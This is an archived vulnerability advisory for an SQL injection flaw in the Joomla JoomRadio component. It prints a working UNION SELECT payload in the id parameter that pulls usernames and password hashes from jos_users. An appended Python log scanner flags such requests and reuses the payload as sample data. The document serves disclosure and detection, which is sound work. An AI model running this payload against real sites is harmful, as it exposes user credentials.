Joomla Component com_joomradio SQL Injection

2009.02.19
Credit: 0o_zeus_o0
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: CWE-89

###########################################################################
# Advisory X
# Title: Joomla Component com_joomradio SQL Injection
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: arturo_zamora_c_at_hotmail.com
# Website: www.securitybroken.com
# Date: 18/02/09
# Risk: Medium
# Vendor Url: http://ajaxportal.eu/
# Affected Software: JoomRadio
# Script authors: XrByte <info_at_exp.ee>, Grusha <grusha_at_feellove.eu>
##################################################################
#
#Example:
##################################################################
#htp:// victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_radio&id=-1UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--
#
##################################################################
#greetz:
#
# original advisory: http://www.securitybroken.com
##################################################################

References:

http://seclists.org/fulldisclosure/2009/Feb/0203.html
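
The advisory's example request places SQL in the `id` parameter of `option=com_joomradio&page=show_radio`. The following is an added example, not part of the original advisory: a log check that flags such requests. It assumes access-log entries with a quoted request line and that a legitimate `id` is a plain integer; the function names and log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, quote, unquote_plus, urlsplit

# Request line of an access-log entry; the target may contain raw spaces.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Assumption: a legitimate JoomRadio id is a plain non-negative integer.
VALID_ID_RE = re.compile(r"\d+")
SQL_HINT_RE = re.compile(r"\b(?:union|select|concat|from)\b|--", re.I)

def decode_fully(value, max_rounds=3):
    """Undo nested URL encoding (%2520 -> %20 -> space) before matching."""
    for _ in range(max_rounds):
        value = unquote_plus(value)
    return value

def inspect_line(line):
    """Return a finding for a com_joomradio request with a non-integer id, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_joomradio" not in (v.lower() for v in params.get("option", [])):
        return None
    for raw_id in params.get("id", []):
        value = decode_fully(raw_id)
        if not VALID_ID_RE.fullmatch(value):
            return {"client": line.split(" ", 1)[0], "id": value,
                    "sql_keywords": bool(SQL_HINT_RE.search(value))}
    return None

def scan(lines):
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log; the payload is the one quoted in the advisory.
PAYLOAD = ("-1UNION SELECT user(),concat(username,0x3a,password),"
           "user(),user(),user(),user(),user() FROM jos_users--")
BASE = "/index.php?option=com_joomradio&page=show_radio&id="
def entry(ip, target):
    return f'{ip} - - [18/Feb/2009:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'
SAMPLE_LOG = [
    entry("192.0.2.10", BASE + "7"),                        # normal request
    entry("198.51.100.23", BASE + quote(PAYLOAD)),          # encoded once
    entry("198.51.100.24", BASE + quote(quote(PAYLOAD))),   # encoded twice
    entry("192.0.2.11", "/index.php?option=com_content&id=-1"),  # other component
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Flagging on "id is not an integer" rather than on SQL keywords alone keeps the check effective when the keywords are obfuscated; `sql_keywords` is only a triage hint.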



Copyright 2024, cxsecurity.com

 
